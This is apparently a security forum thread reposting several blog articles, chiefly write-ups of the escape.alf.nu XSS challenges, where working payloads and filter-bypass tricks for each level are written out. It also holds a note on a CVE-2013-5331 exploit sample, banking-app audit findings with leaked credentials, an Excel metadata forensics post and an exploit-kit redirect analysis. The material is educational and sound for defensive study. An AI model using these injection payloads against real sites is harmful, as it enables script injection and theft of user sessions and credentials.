[TR] [TD=class: gutter]1[/TD] [TD=class: code]<script>'({"userdata":"';alert(1)<!--"})</script>[/TD] [/TR] [/TABLE] Level 13: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19[/TD] [TD=class: code]function escape(s) { var tag = document.createElement('iframe'); // For this one, you get to run any code you want, but in a "sandboxed" iframe. // // http://print.alf.nu/?text=... just outputs whatever you pass in. // // Alerting from print.alf.nu won't count; try to trigger the one below. s = '<script>' + s + '<\/script>'; tag.src = 'http://print.alf.nu/?html=' + encodeURIComponent(s); window.WINNING = function() { youWon = true; }; tag.onload = function() { if (youWon) alert(1); }; document.body.appendChild(tag); }[/TD] [/TR] [/TABLE] Iframes have a interesting feature: setting the name attribute on an iframe sets the name property of the iframe’s global window object to the value of that string. Now, the interesting part is that it can be done the other way around, so an iframe can define its own window.name and the new name will be injected in the parent’s global window object if it does not exist already (it cannot overwrite it). So if we fool the framed site to declare its window.name as “youWon”, a youWon variable will be setted in the parent global window object and so the “alert(1)” will be popped Solution: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]name='youWon'[/TD] [/TR] [/TABLE] Level 14: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18[/TD] [TD=class: code]<!DOCTYPE HTML> function escape(s) { function json(s) { return JSON.stringify(s).replace(/\//g, '\\/'); } function html(s) { return s.replace(/[<>"&]/g, function(s) { return '' + s.charCodeAt(0) + ';'; }); } return ( '<script>' + 'var url = ' + json(s) + '; // We\'ll use this later ' + '</script>\n\n' + ' <!-- for debugging -->\n' + ' URL: ' + html(s) + '\n\n' + '<!-- then suddenly -->\n' + '<script>\n' + ' if (!/^http:.*/.test(url)) console.log("Bad url: " + url);\n' + ' else new Image().src = url;\n' + '</script>' ); }[/TD] [/TR] [/TABLE] In order to solve this level we need to be familiar with an HTML5 parser “feature” when dealing with comments in JS blocks. This feature is well described in this post (thanks for the hint @cgvwzq!). The trick is that injecting an HTML5 single line comment “<!—” followed by a “<script>” open tag will move the parser into the “script data double escaped state” until the closing script tag is found and then it will transition into “script data escaped state” and it will treat anything from the end of the string where we injected the “<!—<script>” as JS! only thing we need to do is making sure there is a “—>” so that the parser does not throw an invalid syntax exception. So basically, if there is a “—>” somewhere in the code (or we can inject it) we can fool the parser into processing HTML as JS. The string where we inject “<!—<script>” will still be considered as a JS string an everything following the string will become JS. For this level we will make the JS engine to parse the HTML part (URL: xxx). In order to do so, we will start our payload with “alert(1)” so that the first JS evaluated will be “URL: alert(1)” then we want to comment out the remaining JS code so we will insert a multi-line comment start “/”. This way everything else will be commented out until we reach the “/” present in the regexp; the code from that point on will be evaluated. In order to get a valid regexp we will also inject “if(/a/” before the multi-line comment start. So our payload will look like: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]alert(1);/*<!--<script>*/if(/a//*[/TD] [/TR] [/TABLE] The resulting code will be: Now if we clean it up and remove the comments (in grey): [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]<script> var url = "alert(1);\/*<!--<script>*\/if(\/a\/\/*"; URL: alert(1); if(/a/.test(url)) console.log("Bad url: " + url); else new Image().src = url; </script>[/TD] [/TR] [/TABLE] We can get it even shorter with: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]if(alert(1)/*<!--<script>[/TD] [/TR] [/TABLE] This will turn into: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]<script> var url = "alert(1);\/*<!--<script>*\/if(\/a\/\/*"; URL: if(alert(1).test(url)) console.log("Bad url: " + url); else new Image().src = url; </script>[/TD] [/TR] [/TABLE] Level 15: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8[/TD] [TD=class: code]function escape(s) { return s.split('#').map(function(v) { // Only 20% of slashes are end tags; save 1.2% of total // bytes by only escaping those. var json = JSON.stringify(v).replace(/<\//g, '<\\/'); return '<script>console.log('+json+')</script>'; }).join(''); }[/TD] [/TR] [/TABLE] We can use the same trick we used for level 14. We can start with something simple like: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]payload1#payload2[/TD] [/TR] [/TABLE] that will render: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]<script>console.log("payload1")</script><script>console.log("payload2")</script>[/TD] [/TR] [/TABLE] We can take advantage of HTML5 “<!—<script>” trick to change the way the parser treats the code between the two blocks and inject our “alert(1)” payload. Note that this trick only works in HTML5 documents and we will need to inject a closing “—>” since it is not present in the code The solution is: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]<!--<script>#)/;alert(1)//-->[/TD] [/TR] [/TABLE] This will render: Since we transition to “script data double escaped state” when the parser finds “<!—<script>”, the JS engine will receive the following valid JS expression: That can be interpreted as: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]console.log("junk_string") < /junk_regexp/ ; alert(1) // -->[/TD] [/TR] [/TABLE] Where: junk_string: <!—<script> junk_regexp: script><script>console.log(“) Actually you can see in the console that the first console.log writes ‘<!—<script>’ In order to make it even shorter we can replace “//” with unicode \u2028 as suggested by Mario Level 16: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23[/TD] [TD=class: code]function escape(text) { // *cough* not done var i = 0; window.the_easy_but_expensive_way_out = function() { alert(i++) }; // "A JSON text can be safely passed into JavaScript's eval() function // (which compiles and executes a string) if all the characters not // enclosed in strings are in the set of characters that form JSON // tokens." if (!(/[^,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/.test( text.replace(/"(\\.|[^"\\])*"/g, '')))) { try { var val = eval('(' + text + ')'); console.log('' + val); } catch (_) { console.log('Crashed: '+_); } } else { console.log('Rejected.'); } }[/TD] [/TR] [/TABLE] This level is based on a real world filter described by Stefano Di Paola in this post If we study the regexp carefully we will see that the letter “s” is allowed since its within the “u-r” interval, that allows us to use the word “self” and with that we can craft a valid JSON payload. The trick is that we will be adding “0” to our object so the JS engine will need to calculate the valueOf our object. So if we define the “valueOf” function as the “the_easy_but_expensive_way_out” global function, we will be able to invoke it during the arithmetic operation. The problem is that it will alert “0” since “i” its initialized with “0”, but we can do it twice to alert a “1”. Long Solution: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]{"valueOf":self["the_easy_but_expensive_way_out"]}+0,{"valueOf":self["the_easy_but_expensive_way_out"]}[/TD] [/TR] [/TABLE] That is a nice trick to execute a function when parenthesis are not allowed. But there some more like Gareth famous one: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]onerror=eval;throw['=1;alert\x281\x29'][/TD] [/TR] [/TABLE] You can get a shorter solution for IE only as explained by Stefano Di Paola in his post [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]{"valueOf":self["location"],"toString":[]["join"],0:"javascript:alert(1)","length":1}[/TD] [/TR] [/TABLE] And thats all folks, thanks for reading! Posted by Alvaro Muñoz Jan 8th, 2014 Sursa: escape.alf.nu XSS Challenges Write-ups (Part 2) - PwnTesting
  16. [h=1]escape.alf.nu XSS Challenges Write-ups[/h] These are my solutions to Erling Ellingsen escape.alf.nu XSS challenges. I found them very interesting and I learnt a lot from them (especially from the last ones to be published in Part 2). Im publishing my results since the game has been online for a long time now and there are already some sites with partial results. My suggestion, if you havent done it so far, is to go and try to solve them by yourselves…. so come on, dont be lazy, stop reading here and give them a try … … … … … Ok so if you have already solve them or need some hits, here are my solutions [h=1]Level 0:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 [/TD] [TD=class: code] function escape(s) { // Warmup. return '<script>console.log("'+s+'");</script>'; } [/TD] [/TR] [/TABLE] There is no encoding so the easiest solution is to close “log” call and inject our “alert” Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] ");alert(1," [/TD] [/TR] [/TABLE] [h=1]Level 1:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 [/TD] [TD=class: code] function escape(s) { // Escaping scheme courtesy of Adobe Systems, Inc. s = s.replace(/"/g, '\\"'); return '<script>console.log("' + s + '");</script>'; } [/TD] [/TR] [/TABLE] Function is escaping double quotes by adding two slashes. Shortest solution is to inject \“ so the escape function turns it into [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] \\\" [/TD] [/TR] [/TABLE] Effectively escaping the backslash but not the double quotes. Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] \");alert(1)// [/TD] [/TR] [/TABLE] [h=1]Level 2:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 [/TD] [TD=class: code] function escape(s) { s = JSON.stringify(s); return '<script>console.log(' + s + ');</script>'; } [/TD] [/TR] [/TABLE] JSON.stringify() will escape double quotes (“) into (\”) but it does not escaps angle brackets (<>), so we can close the current script block and start a brand new one. Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] </script><script>alert(1)// [/TD] [/TR] [/TABLE] [h=1]Level 3:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 [/TD] [TD=class: code] function escape(s) { var url = 'javascript:console.log(' + JSON.stringify(s) + ')'; console.log(url); var a = document.createElement('a'); a.href = url; document.body.appendChild(a); a.click(); } [/TD] [/TR] [/TABLE] Again (“) is escaped but since we are within a URL context we can use URL encoding. In this case %22 for (”) Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] %22);alert(1)// [/TD] [/TR] [/TABLE] [h=1]Level 4:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 [/TD] [TD=class: code] function escape(s) { var text = s.replace(/</g, '<').replace('"', '"'); // URLs text = text.replace(/(http:\/\/\S+)/g, '<a href="$1">$1</a>'); // [[img123|Description]] text = text.replace(/\[\[(\w+)\|(.+?)\]\]/g, '<img alt="$2" src="$1.gif">'); return text; } [/TD] [/TR] [/TABLE] The following characters are replaced: < ? < (all ocurrences) " ? " (just the first occurrence) The escape function also use a template like [[src|alt]] that becomes [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <img alt="alt" src="src.gif"> [/TD] [/TR] [/TABLE] We can use this template with any src and an alt starting with a double quote (“) that will be escaped, a second double quote (”) that won’t be escaped and then a new event handler like onload=“alert(1) that will be closed by the double quote inserted by the template. Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] [[a|""onload="alert(1)]] [/TD] [/TR] [/TABLE] It will be rendered as: [h=1]Level 5:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 [/TD] [TD=class: code] function escape(s) { // Level 4 had a typo, thanks Alok. // If your solution for 4 still works here, you can go back and get more points on level 4 now. var text = s.replace(/</g, '<').replace(/"/g, '"'); // URLs text = text.replace(/(http:\/\/\S+)/g, '<a href="$1">$1</a>'); // [[img123|Description]] text = text.replace(/\[\[(\w+)\|(.+?)\]\]/g, '<img alt="$2" src="$1.gif">'); return text; } [/TD] [/TR] [/TABLE] Now we cannot rely on the (“) regexp typo but we can still use the template function to generate an image tag executing our alert(1) when loaded. We will use any src and a URL that will be replaced by the second replace function. Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] [[a|http://onload='alert(1)']] [/TD] [/TR] [/TABLE] The first replace function wont trigger with this payload The second replace function will act on the URL getting: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] [[a|<a href=http://onload='alert(1)]]">http://onload='alert(1)']]</a> [/TD] [/TR] [/TABLE] The third replace function will create our img tag [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <img alt="<a href="http://onload='alert(1)']]">http://onload='alert(1)'" src="a.gif"> [/TD] [/TR] [/TABLE] It will be rendered as: [h=1]Level 6:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 [/TD] [TD=class: code] function escape(s) { // Slightly too lazy to make two input fields. // Pass in something like "TextNode#foo" var m = s.split(/#/); // Only slightly contrived at this point. var a = document.createElement('div'); a.appendChild(document['create'+m[0]].apply(document, m.slice(1))); return a.innerHTML; } [/TD] [/TR] [/TABLE] The trick is to review all the functions in the DOM that begin with “create” and that dont escape characters. The shortest one is to use “createComment”. For example Comment#<foo> will create the following code: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <!--<foo>--> [/TD] [/TR] [/TABLE] From there, its easy to go to: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] Comment#><svg onload=alert(1) [/TD] [/TR] [/TABLE] That will render: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <!--><svg onload=alert(1)--> [/TD] [/TR] [/TABLE] [h=1]Level 7:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 [/TD] [TD=class: code] function escape(s) { // Pass inn "callback#userdata" var thing = s.split(/#/); if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback'; var obj = {'userdata': thing[1] }; var json = JSON.stringify(obj).replace(/</g, '\\u003c'); return "<script>" + thing[0] + "(" + json +")</script>"; } [/TD] [/TR] [/TABLE] We will enclose the opening bracket and the json fixed contents with single quotes to transform it into a string and then we will be able to inject our js payload: Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] '#';alert(1)// [/TD] [/TR] [/TABLE] It will render: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <script>'({"userdata":"';alert(1)//"})</script> [/TD] [/TR] [/TABLE] [h=1]Level 8:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 [/TD] [TD=class: code] function escape(s) { // Courtesy of Skandiabanken return '<script>console.log("' + s.toUpperCase() + '")</script>'; } [/TD] [/TR] [/TABLE] There is no escaping function, only an upper case, so we can close the exisiting <script> tag and create a new tag (case insensitive) with an onload script using no alpha characters: These are some valid solutions: [TABLE] [TR] [TD=class: gutter] 1 2 3 [/TD] [TD=class: code] </script><svg><script>alert(1)// (52) </script><svg onload=alert(1)// (51) </script><svg onload=alert(1)// (50) [/TD] [/TR] [/TABLE] I guess people solving the challange with 28 characters or so did something like: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] </script><script src="<very short domain>"> [/TD] [/TR] [/TABLE] Posted by Alvaro Muñoz Jan 6th, 2014 Sursa: escape.alf.nu XSS Challenges Write-ups (Part 1) - PwnTesting
  17. [h=3]CVE-2013-5331 evaded AV by using obscure Flash compression ZWS[/h] We recently came across what is likely the CVE-2013-5331 zero day (Adobe Flash in MS Office .doc) file on virustotal.com (Biglietto Visita.doc, MD5: 2192f9b0209b7e7aa6d32a075e53126d, 0 detections on 2013-11-11, 2/49 on 2013-12-23). The filename is Italian for "visit card" and could be related to MFA targeting in Italy. This exploit was patched 2013-12-10, and was in the wild for at least a full month. While it appears to be the only CVE-2013-5331 sample on Virustotal we could find, it's also interesting that the Flash exploit payload is a very unusual ZWS compression (LZMA as in Lempel–Ziv–Markov chain algorithm and originally used in 7zip). CWS or Gzip compression is the most commonly used. This compression method ZWS combined with embedding within MSOffice documents is very likely to evade most AV products. From our Cryptam Database Related files with similar metadata: 5da6a1d46641044b782d5c169ccb8fbf 2013-06-28 CVE-2012-5054 7/46 2013-07-07 8d70043395a2d0e87096c67e0d68f931 2013-06-28 CVE-2013-0633 6/46 2013 07-18 Posted by DT at 2:42 AM Sursa: malware tracker blog: CVE-2013-5331 evaded AV by using obscure Flash compression ZWS
  18. Personal banking apps leak info through phone By Ariel Sanchez For several years I have been reading about flaws in home banking apps, but I was skeptical. To be honest, when I started this research I was not expecting to find any significant results. The goal was to perform a black box and static analysis of worldwide mobile home banking apps. The research used iPhone/iPad devices to test a total of 40 home banking apps from the top 60 most influential banks in the world. In order to obtain a global view of the state of security, some of the more important banks from the following countries were included in the research: Relevant Points The research was performed in 40 hours (non-consecutive). This research does not show the vulnerabilities found and how to exploit them in order to protect the owner of the app and their customers. All tests were only performed on the application (client side); the research excluded any server-side testing. Some of the affected banks were contacted and the vulnerabilities reported. Tests The following tests were performed for each application: Transport Security Plaintext Traffic Improper session handling Properly validate SSL certificates [*] Compiler Protection Anti-jailbreak protection Compiled with PIE Compiled with stack cookies Automatic Reference Counting [*] UIWebViews Data validation (input, output) Analyze UIWebView implementations [*] Insecure data storage SQLlite database File caching Check property list files Check log files [*] Logging Custom logs NSLog statements Crash reports files [*] Binary analysis Disassemble the application Detect obfuscation of the assembly code protections Detect anti-tampering protections Detect anti-debugging protections Protocol handlers Client-side injection Third-party libraries Summary All of the applications could be installed on a jailbroken iOS device. This helped speed up the static and black box analysis. Black Box Analysis Results The following tools were used for the black box analysis: otool (object file displaying tool)[1] Burp pro (proxy tool)[2] ssh (Secure Shell) 40% of the audited apps did not validate the authenticity of SSL certificates presented. This makes them susceptible to Man in The Middle (MiTM) attacks.[3] A few apps (less than 20%) did not have Position Independent Executable (PIE) and Stack Smashing Protection enabled. This could help to mitigate the risk of memory corruption attacks. >#otool –hv MobileBank MobileBank: Mach header magic cputype cpusubtype caps filetype ncmds sizeofcmds flags MH_MAGIC ARM V6 0x00 EXECUTE 24 3288 NOUNDEFS DYLDLINK PREBOUND TWOLEVEL Many of the apps (90%) contained several non-SSL links throughout the application. This allows an attacker to intercept the traffic and inject arbitrary JavaScript/HTML code in an attempt to create a fake login prompt or similar scam. Moreover, it was found that 50% of the apps are vulnerable to JavaScript injections via insecure UIWebView implementations. In some cases, the native iOS functionality was exposed, allowing actions such as sending SMS or emails from the victim’s device. A new generation of phishing attacks has become very popular in which the victim is prompted to retype his username and password “because the online banking password has expired”. The attacker steals the victim’s credentials and gains full access to the customer’s account. The following example shows a vulnerable UIWebView implementation from one of the home baking apps. It allows a false HTML form to be injected which an attacker can use to trick the user into entering their username and password and then send their credentials to a malicious site. Another concern brought to my attention while doing the research was that 70% of the apps did not have any alternative authentication solutions, such as multi-factor authentication, which could help to mitigate the risk of impersonation attacks. Most of the logs files generated by the apps, such as crash reports, exposed sensitive information. This information could be leaked and help attackers to find and develop 0day exploits with the intention of targeting users of the application. Most of the apps disclosed sensitive information through the Apple system log. The following example was extracted from the Console system using an iPhone Configuration Utility (IPCU) tool. The application dumps user credentials of the authentication process. … CA_DEBUG_TRANSACTIONS=1 in environment to log backtraces. Jun 22 16:20:37 Test Bankapp[2390] <Warning>: <v:Envelope xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:d="http://www.w3.org/2001/XMLSchema" xmlns:c="http://schemas.xmlsoap.org/soap/encoding/" xmlns:v="http://schemas.xmlsoap.org/soap/envelope/"> <v:Header /> <v:Body> <n0:loginWithRole id="o0" c:root="1" xmlns:n0="http://mobile.services.xxxxxxxxx.com/"> <in0 i:type="d:string">USER-ID</in1> <in1 i:type="d:string">XRS</in2> <in2 i:type="d:string">PASSWORD</in3> <in3 i:type="d:string">xxxxxxxx</in4> </n0:loginWithRole> </v:Body> </v:Envelope> Jun 22 16:20:37 Test Bankapp[2390] <Warning>: ]]]]]]]]]]]]] wxxx.xxxxx.com Jun 22 16:20:42 Test Bankapp[2390] <Warning>: RETURNED: Jun 22 16:20:42 Test Bankapp [2390] <Warning>: CoreAnimation: warning, deleted thread with uncommitted CATransaction; set CA_DEBUG_TRANSACTIONS=1 in environment to log backtraces. … Static Analysis Results The following tools were used for the static analysis and decryption: IDA PRO (disassembler tool) [4] Clutch (cracking utility) [5] objc-helper-plugin-ida [6] ssh (Secure Shell) gdb (debugger tool) IPCU [7] The binary code of each app was decrypting using Clutch. A combination of decrypted code and code disassembled with IDA PRO was used to analyze the application. Hardcoded development credentials were found in the code. __text:00056350 ADD R0, PC ; selRef_sMobileBankingURLDBTestEnv__ __text:00056352 MOVT.W R2, #0x46 __text:00056356 ADD R2, PC ; "https://mob_user:T3stepwd@db.internal/internal/db/start.do?login=mobileEvn" __text:00056358 LDR R1, [R0] ; "setMobileBankingURLDBTestEnv_iPad_mobil"... __text:0005635A MOV R0, R4 __text:0005635C BLX _objc_msgSend __text:00056360 MOV R0, (selRef_setMobileBankingURLDBTestEnvWithValue_iPad_mobileT_ - 0x56370) ; selRef_setMobileBankingURLDBTestEnvWithValue_iPad_mobileT_ __text:00056368 MOVW R2, #0xFA8A __text:0005636C ADD R0, PC ; selRef_setMobileBankingURLDBTestEnvWithValue_i_mobileT_ __text:0005636E MOVT.W R2, #0x46 __text:00056372 ADD R2, PC ; "https://mob_user:T3stepwd@db.internal/internal/db/start.do?login=mobileEvn&branch=%@&account=%@&subaccount=%@" __text:00056374 LDR R1, [R0] ; "setMobileBankingURLDBTestEnvWith_i"... __text:00056376 MOV R0, R4 __text:00056378 BLX _objc_msgSend By using hardcoded credentials, an attacker could gain access to the development infrastructure of the bank and infest the application with malware causing a massive infection for all of the application’s users. Internal functionality exposed via plaintext connections (HTTP) could allow an attacker with access to the network traffic to intercept or tamper with data. __text:0000C980 ADD R2, PC ; "http://%@/news/?version=%u" __text:0000C982 MOVT.W R3, #9 __text:0000C986 LDR R1, [R1] ; "stringWithFormat:" __text:0000C988 ADD R3, PC ; "Mecreditbank.com" __text:0000C98A STMEA.W SP, {R0,R5} __text:0000C98E MOV R0, R4 __text:0000C990 BLX _objc_msgSend __text:0000C994 MOV R2, R0 ... __text:0001AA70 LDR R4, [R2] ; _OBJC_CLASS_$_NSString __text:0001AA72 BLX _objc_msgSend __text:0001AA76 MOV R1, (selRef_stringWithFormat_ - 0x1AA8A) ; selRef_stringWithFormat_ __text:0001AA7E MOV R2, (cfstr_HttpAtmsOpList - 0x1AA8C) ; "http://%@/atms/?locale=%@&version=%u" __text:0001AA86 ADD R1, PC; selRef_stringWithFormat_ __text:0001AA88 ADD R2, PC; "http://%@/atms/version=%u" __text:0001AA8A __text:0001AA8A loc_1AA8A ; CODE XREF: -[branchesViewController processingVersion:]+146j __text:0001AA8A MOVW R3, #0x218C __text:0001AA8E LDR R1, [R1] __text:0001AA90 MOVT.W R3, #8 __text:0001AA94 STMEA.W SP, {R0,R5} __text:0001AA98 ADD R3, PC ; "Mecreditbank.com" __text:0001AA9A MOV R0, R4 __text:0001AA9C BLX _objc_msgSend Moreover, 20% of the apps sent activation codes for accounts though plainttext communication (HTTP). Even if this functionality is limited to initial account setup, the associated risk high. If an attacker intercepts the traffic he could hijack a session and steal the victim’s account without any notification or evidence to detect the attack. After taking a close look at the file system of each app, some of them used an unencrypted Sqlite database and stored sensitive information, such as details of customer’s banking account and transaction history. An attacker could use an exploit to access this data remotely, or if they have physical access to the device, could install jailbreak software in order to steal to the information from the file system of the victim’s device. The following example shows an Sqlite database structure taken from the file system of an app where bank account details were stored without encryption. Other minor information leaks were found, including: Internal IP addresses: __data:0008B590 _TakeMeToLocationURL DCD cfstr_Http10_1_4_133 __data:0008B590 ; DATA XREF: -[NavigationView viewDidLoad]+80o __data:0008B590 ; __nl_symbol_ptr:_TakeMeToLocationURL_ptro __data:0008B590 ; "http://100.10.1.13:8080/WebTestProject/PingTest.jsp" Internal file system paths: __cstring:000CC724 aUsersXXXXPro DCB "/Users/Scott/projects/HM_iphone/src/HBMonthView.m",0 Even though disclosing this information on its own doesn't have a significant impact, an attacker who collected a good number of these leaks could gain an understanding of the internal layout of the application and server-side infrastructure. This could enable an attacker to launch specific attacks targeting both the client- and server-side of the application. Conclusions From a defensive perspective, the following recommendations could mitigate the most common flaws: Ensure that all connections are performed using secure transfer protocols Enforce SSL certificate checks by the client application Protect sensitive data stored on the client-side by encrypting it using the iOS data protection API Improve additional checks to detect jailbroken devices Obfuscate the assembly code and use anti-debugging tricks to slow the progress of attackers when they try to reverse engineer the binary Remove all debugging statements and symbols Remove all development information from the production application Home banking apps that have been adapted for mobile devices, such as smart phones and tablets, have created a significant security challenge for worldwide financial firms. As this research shows, financial industries should increase the security standards they use for their mobile home banking solutions. References: [1]http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man1/otool.1.html [2] Burp Suite Editions [3] https://www.owasp.org/index.php/Man-in-the-middle_attack [4] https://www.hex-rays.com/products/ida/ [5] https://www.appaddict.org/forum/index.php?/topic/40-how-to-crack-ios-apps/ [6] https://github.com/zynamics/objc-helper-plugin-ida [7] Apple - Support - Downloads Cesar at 7:00 AM Sursa: IOActive Labs Research: Personal banking apps leak info through phone
  19. [h=3]MS Excel 2013 Last Saved Location Metadata[/h] The release of Microsoft Office 2013 granted the ability to save files in formats not previously available (such as "Strict OOXML"), but the default format remained the same as Office 2007 and 2010. Despite the common file format, I've found that Microsoft Excel 2013 spreadsheets maintain additional metadata not available in earlier versions of Excel. Specifically, it appears that the absolute path to the directory in which the spreadsheet was last saved is maintained by Excel 2013 spreadsheets. I have not yet found a tool that presents the last saved location with other metadata from an Excel 2013 spreadsheet, but this information can easily be found by opening the "workbook.xml" file embedded in the parent spreadsheet. Simply changing the file extension from "xlsx" to "zip" and using a zip-extraction utility to extract the contents of the spreadsheet is a quick way to gain access to the embedded files without requiring any specialized tools. Workbook.xml contains information about the Excel file such as worksheet names, window height and width parameters, and a bit of other information. For the most part, this XML file appears to be similar across files created using Excel 2007, 2010, and 2013, however, there is one key difference: the "x15ac:absPath" element. The "x15ac:absPath" element is a child element of "mc:Choice" (which is a child element of "mc:AlternateContent") and contains an attribute called "url" that corresponds to the last saved location of the spreadsheet. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Workbook.xml file from Excel 2013[/TD] [/TR] [/TABLE] Information from the "url" attribute could be helpful in many cases, particularly those in which the previous location of a spreadsheet is significant. For example, examining this metadata field in a spreadsheet copied to a USB device could allow the examiner to identify the previous directory in which the spreadsheet was saved (before it was copied to the USB device). It's important to note, however, that resaving a 2013 spreadsheet using Excel 2007 or 2010 appears to remove the "x15ac:absPath" element. If you know that a spreadsheet was created using Excel 2013 but are unable to find the last saved location metadata, it's possible that the spreadsheet was last saved in a version of Excel other than 2013. This can be verified through the "fileVersion" element, which is the first child element of "workbook". The "fileVersion" element includes an attribute called "lastEdited" and, according to Microsoft documentation, the "lastEdited" attribute "specifies the version of the application that last saved the workbook". Interestingly, the value specified in the "lastEdited" attribute is not consistent with the application version of Excel (i.e. 2007=12.x, 2010=14.x, etc.). Instead, this value is a single-digit numeral corresponding to a particular version of Excel. I've ran some quick tests using 2007, 2010, and 2013 and summarized the corresponding fileVersion values for each Excel version in the table below. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]fileVersion Value to Excel Version Mapping[/TD] [/TR] [/TABLE] Importantly, Excel 2013 is aware of the last saved location metadata and will clear this information if the user elects to do so using Excel's built-in Document Inspector. Otherwise, this data should travel with the file until it is saved again, at which point this metadata will either be removed or updated (depending on the version of Excel that saved the file). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Excel 2013 Document Inspector identifies Last Saved Location Metadata[/TD] [/TR] [/TABLE] Posted by Jason Hale at 11:35 PM Sursa: Digital Forensics Stream: MS Excel 2013 Last Saved Location Metadata
  20. Banking apps: insecure and badly written, say researchers Buggy code, bad security By Richard Chirgwin, 13th January 2014 Security researchers IO Active are warning that many smartphone banking apps are leaky and need to be fixed. Testing 40 iOS-based banking apps from 60 banks around the world, the research summary is pretty nerve-wracking: 40 per cent are vulnerable to man-in-the-middle attacks, because they don't validate the authenticity of SSL certificates presented by the server; 20 per cent lacked “Position Independent Executable (PIE) and Stack Smashing Protection enabled”, which IO Active says is used to help mitigate memory corruption attacks; Half the apps are vulnerable to cross-site-scripting (XSS) attacks; Over 40 per cent leave sensitive information in the system log; and Over 30 per cent use hard-coded credentials of some kind. Most worrying, however, are a couple of 90 per cent statistics: the number of apps that included non-SSL links, and the number that lack jailbreak detection. Even those with detection could still be installed: “All of the applications could be installed on a jailbroken iOS device. This helped speed up the static and black box analysis”, writes IO Active's Ariel Sanchez. By including non-SSL links in the apps, Sanchez says, an attacker could “intercept the traffic and inject arbitrary JavaScript/HTML code in an attempt to create a fake login prompt or similar scam.” “Moreover, it was found that 50% of the apps are vulnerable to JavaScript injections via insecure UIWebView implementations. In some cases, the native iOS functionality was exposed, allowing actions such as sending SMS or emails from the victim’s device,” he continues. This UIWebView implementation allows a false HTML form to be injected. Source: IO Active The IO Active post also details a number of other information leaks, including unencrypted data stored in sqlite databases, and information like IP addresses and application paths that could let a determined and skilled attacker draw inferences about the server-side infrastructure the app is talking to. The research only looked at the client side, Sanchez states, and where possible, IO Active notified banks of the vulnerabilities he identified. ® Sursa: Banking apps: insecure and badly written, say researchers • The Register
  21. Sneaky Redirect to Exploit Kit Posted on January 12, 2014 by darryl While I was testing a Pinpoint update, I found a sneaky method to redirect unsuspecting users to Neutrino EK. This one was interesting to me so I thought I would document it here. Here’s the website I visited…looks suspicious already: There was a reference to an external Javascript file: The file is obfuscated Javascript which is a red flag: I found the malicious redirect, or so I thought… Long story short, this led nowhere. Going back to the main page, there is a call to a Flash file at the bottom. Reviewing the ActionScript reveals something interesting. It reads in a PNG file called “gray-bg.png”, extracts every other character, then evals it. The “PNG file is not a graphic file but a renamed text file. I used Converter to extract one character every two positions and got this: The URL leads to the Neutrino landing page. Sursa: Sneaky Redirect to Exploit Kit | Kahu Security
